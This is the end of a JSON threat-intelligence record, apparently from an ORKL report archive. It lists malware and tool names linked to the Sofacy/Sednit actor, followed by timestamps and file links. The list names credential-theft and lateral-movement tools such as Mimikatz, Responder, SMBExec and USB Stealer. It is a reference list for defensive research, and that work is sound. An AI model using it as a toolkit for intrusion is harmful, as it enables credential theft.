				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434567,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/de4e6aa992a4ff73f9b6d7fb281f149c35a0bac7.pdf",
		"text": "https://archive.orkl.eu/de4e6aa992a4ff73f9b6d7fb281f149c35a0bac7.txt",
		"img": "https://archive.orkl.eu/de4e6aa992a4ff73f9b6d7fb281f149c35a0bac7.jpg"
	}
}